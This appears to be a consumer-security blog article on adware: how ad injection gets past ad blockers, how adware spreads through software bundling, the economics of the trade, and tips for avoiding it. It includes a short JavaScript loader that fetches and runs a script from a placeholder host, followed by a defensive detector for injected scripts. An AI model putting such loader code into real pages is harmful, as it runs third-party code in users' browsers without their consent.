Adware: Why Your Ad Blocker Isn’t Blocking Ads and How to Fix It


You’ve been using an ad blocker for a while. All the ads that bothered you before are gone. It’s glorious.

Until you see an ad.

Your knee-jerk reaction is that your ad blocker has stopped working or that something has gone wrong. Sometimes this is exactly the case, especially if the ad blocker isn’t in your list of programs that launch on Windows startup.

But what if your ad blocker is running as usual when you see a banner ad or pop-up? Worse yet—what if this ad appears on a website or page that, based on general knowledge, never displays ads?

A quick Google search yields suspicious results, tabs that self-open, and loads of advertisements. You have adware.

Adware injecting an ad on Google homepage

What Is Adware?

Search settings modified by Adware lead to rogue search engine

It may seem that all these ads and browser redirections are coming from the web, but in reality they are triggered locally, from your PC, by a type of malicious (unwanted) program called “adware”. These apps or extensions use so-called “ad injection” techniques to serve ads directly in your browser, which lets them easily circumvent ad blocking software.

By definition, adware is an application or extension that displays ads in order to support itself and its authors. Technically, any ad-supported software may be classified as “adware”, even Skype! After all, it does show ads to users and falls squarely under this category. There are tons of legitimate ad-supported apps, however, so for the sake of clarity we will define adware according to the Microsoft Malware Protection Center:

“The software runs unwanted processes or programs on your PC, does not display adequate disclosures about its behavior or obtain adequate consent, prevents you from controlling its actions while it runs on your computer, prevents you from uninstalling or removing the program, prevents you from viewing or modifying browser features or settings, makes misleading or inaccurate claims about the state of your PC, or circumvents user consent dialogs from the browser or operating system.”


The same document clarifies the differences between unwanted software and various types of malware:

“Malicious software is the general name for programs that perform malicious actions on your PC. This can include stealing your personal information, locking your PC until you pay a ransom, using your PC to send spam, or downloading other malicious software.”

There is a fine line between adware and malware, since some adware samples demonstrate traits of malicious programs. In general, every antivirus company has its own definition of Potentially Unwanted Software.

Adware has been around for years and, along with malvertising, is one of the persistent challenges for online advertisers and Internet users alike. Let’s take a closer look at how adware operates and how it is distributed, as well as its underground mechanisms and economy, which are rarely brought into the spotlight.

How Does Adware Get on My PC If I Have Antivirus (AV) Software Installed?

Because of ambiguous definitions, a lot of adware or “crapware” is actually legal and can’t be flagged as malware by antivirus companies without risking lawsuits. Le sigh—being annoying isn’t a crime. In an attempt to safeguard their users from these apps, antivirus companies coined the term “Potentially Unwanted Software”. Depending on the vendor, some of them prominently disclose adware apps as such during the download or installation attempt. The final decision is up to the user.

ESET dialogue box, notifying the user about a potentially unwanted program

By rolling out new adware and quickly distributing it, adware authors seize the window of opportunity to capitalize on a specific sample before it is detected by most AVs. Antivirus vendors have a lot on their plate with the rise of ransomware, exploit kits and persistent threats to businesses. Despite how frustrating it is, adware is still considered a lesser evil.

How Does Adware Work? It’s All About Ad Injection

Because ad injection occurs entirely in the end user’s browser, website owners are completely unaware of the ads you are seeing on their website.

This is true for small and large websites alike—and it’s ubiquitous.

According to Google’s 2014 study of users’ page code, 89% of the 102.5 million examined had traces of changes made to the browser’s code by third-party actors. That same year, Google started to impose regulations on extensions in its Chrome Web Store, and a total of 50,000 potentially harmful ad-supported extensions were removed.

Adware components are so common partly because ad injection technology gives adware authors a lot of flexibility in the advertising formats they can use to deliver ads. The most popular formats:

  • Banner (static or animated)
  • Pop up/pop under
  • Interstitial ad (appears on page load)
  • Text ads (can be injected into search engine results pages)
  • New tab ad/Redirect (unauthorized tab opening)
  • Search hijackers (change default search settings, redirect user searches)
  • DNS hijacking to modify browser content, using a MitM attack and a rogue SSL certificate

Ad injection on Wikipedia page
New tab/Redirect adware attacking the browser. Source: BleepingComputer.com
DNS hijacking attack explained

Ad Injection Technology

It is worth mentioning that ad injection doesn’t depend on the availability of free space on the targeted website. By design, injected ads may cover legitimate ads. In this case, both legitimate advertisers and site owners incur losses.

Here’s how the technology works:

Ad injection occurs during page rendering, when JavaScript code is inserted into the pages the browser loads. The harmful code alters the page’s DOM (Document Object Model) as it executes inside the <head> or <body> tags.

Here’s an example:

    (function() {
        var e = document.createElement('script');
        // pick the scheme that matches the current page, then load the remote ad script
        e.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'cvrsw-c.b/sd/xxx/xxx.js';
        document.body.appendChild(e);
    })();

Basically, by executing this code on every page in the user’s browser, the code’s author is able to serve ads inside the browser. By distributing the app or extension that carries the code, the author gains access to even more browsers that then serve as ad placements.
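Site owners cannot see injected ads from their servers, but they can watch for the mechanism itself from inside the page. The following is an added example, not code from the original article: a small detector that classifies every <script> element appended after load against a first-party allowlist (ALLOWED_HOSTS is an assumed placeholder) and reports loaders like the one above that pull scripts from an unexpected host.

```javascript
// Added example (not from the original article): site-side detection of
// dynamically injected third-party <script> elements.
// ALLOWED_HOSTS is an assumed first-party allowlist; adjust for the real site.
const ALLOWED_HOSTS = new Set(["example.com", "cdn.example.com"]);

// Resolve a script src (absolute, protocol-relative or relative) against the
// page origin and decide whether it points at a host we do not expect.
function classifyScriptSrc(src, pageOrigin) {
  if (!src) {
    // Inline scripts carry no src; they need a separate policy (e.g. hashing).
    return { injected: false, reason: "inline script, not checked" };
  }
  let url;
  try {
    url = new URL(src, pageOrigin);
  } catch (e) {
    return { injected: true, reason: "unparseable src: " + src };
  }
  if (url.protocol !== "http:" && url.protocol !== "https:") {
    return { injected: false, reason: "non-http scheme " + url.protocol };
  }
  if (ALLOWED_HOSTS.has(url.hostname)) {
    return { injected: false, reason: "allowlisted host " + url.hostname };
  }
  return { injected: true, reason: "unexpected host " + url.hostname };
}

// In a browser, observe the whole document so that any <script> appended after
// load (the pattern ad injectors use) is classified and passed to `report`.
// Returns the observer, or null when there is no DOM (e.g. under Node).
function watchForInjectedScripts(report) {
  if (typeof document === "undefined") return null;
  const observer = new MutationObserver((mutations) => {
    for (const m of mutations) {
      for (const node of m.addedNodes) {
        if (node.nodeName !== "SCRIPT") continue;
        const src = node.getAttribute("src");
        const verdict = classifyScriptSrc(src, document.location.origin);
        if (verdict.injected) report({ src: src, reason: verdict.reason });
      }
    }
  });
  observer.observe(document.documentElement, { childList: true, subtree: true });
  return observer;
}
```

A report callback would typically send the findings to a beacon endpoint so the site owner learns which hosts are being injected into visitors' pages; extension-injected scripts are not restricted by the page's Content Security Policy, which is why observing the DOM is needed at all.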

Adware Distribution Channels

As discussed earlier, the lifetime of an adware app is limited by AVs and by gatekeepers like Google and Microsoft, which can influence its distribution at the platform level (browsers and app stores). So if adware authors are serious about earning money (and they are), covert and large-scale distribution methods are required.

One of the most common ways to spread adware is through software bundling. Users install an adware app along with a software product that they actually wanted. Bundled apps are offered inside the installer of the carrier software, after the carrier install has been initiated. In most cases, adware apps fail to provide prominent notice about their business model and can even deceive users by claiming to be completely free. Another common installer piggyback technique is pre-checked consent dialog boxes that users overlook. What is more, carrier software owners often earn a certain amount for each initiated adware install.

Here’s an example of a carrier (KC Software) offering an installation of the well-known Babylon toolbar, an adware and browser search hijacker.

Adware distribution through software bundling

Bundled app distribution is relatively cheap; the install price varies from $0.08 to $2, depending on the geographic area (Windows OS). Every week over 160 software families are distributed through bundled installs, powered by Pay Per Install networks and standalone carriers. Adware constitutes nearly 60% of the whole segment. Google’s Safe Browsing tool alone detects around 60 million bundled adware downloads. But that’s just Google, and only on Chrome.

Like many other things on the Internet, bundling is just a distribution channel, so not all companies that distribute software this way are rogue. Large companies like Google and Adobe provide complete user control and choice.

Besides bundling, other attack vectors for adware are “free multimedia” apps, including Facebook apps and messengers (Facebook Messenger among them). Free multimedia apps spread adware by mass-messaging the contacts of compromised accounts.

The Shadow Economy of the Adware Industry

The truly massive distribution of ad injection products creates an equally large traffic segment and an enormous opportunity to cash in.

Just how much dough are we talking about?

Let’s say an adware author purchases a healthy 100K installs at $1.50 (US) with an acceptance rate (take rate) of 0.75—an OK rate, since some installs are lost to antivirus detections and other factors. This yields 75K valid installs and expenses of $150K. If we assume an average ad impression cap of 50 per day, an average adware product lifespan of seven days (the 7 in the calculation below), and a modest $10 CPM (cost per 1,000 ad impressions), the expected revenue is staggering.

75,000 × 50 × 7 = 26,250,000 ad impressions, at $10 CPM = $262,500 in gross revenue, a 175% return on the initial investment (ROI).

If that doesn’t surprise you, it should.

Furthermore, this is hardly all of the earnings of an adware author.

Access to victims’ PCs also allows the capture of massive amounts of data that can later be sold.

As a publisher, the adware author will try to sell his ad impressions at the highest possible price. He may sell traffic programmatically through supply-side platforms, or directly to ad injection libraries that resell ad injectors’ traffic to their clients through real-time auctions. In many cases, an ad injection library is the same entity as the adware author. Here’s the list of the largest ones from Google’s report.

Top ad injection libraries

Wait. Who’s buying this sort of traffic?

Remember that adware can inject itself into any of the top sites, like YouTube or CNN.com. In some cases, this traffic will be sold to brands that have hired agencies to manage their advertising campaigns. Since such media buys offer little visibility, brands may not know the origin of this “premium inventory”. This is a considerable brand-safety risk, both in front of customers and next to competitors.

It’s highly doubtful that Best Buy’s marketing department would want such publicity.

Best Buy's ads injected on Dell website

Yet, for some direct response advertisers, ad injection traffic is acceptable, mostly because of the various ad formats and targeting possibilities, including:

  • Contextual targeting (reaching a person at the right time, by search query, browser address string, or a page’s meta tags)
  • Large audience size, with some segmentation by operating system, geography, browser, etc.

Who’s The Biggest Loser in This Story?

Well, users and websites of course.

Websites’ reputations suffer, and so do their ad revenues, since their legitimate advertisers get less and less exposure.

Users suffer because their web experience deteriorates, and they are rarely able to defeat adware on their own. Add to that the privacy risks arising from the data collection.

How To Stay Away From Adware


  • Use an ad blocker with extra privacy features, like anti-phishing. If you do encounter adware, it may block redirects to harmful sites.
  • Keep your OS and browsers updated.
  • Use an AV and the AdwCleaner utility.
  • Use Unchecky to make sure that no consent dialogs are missed.
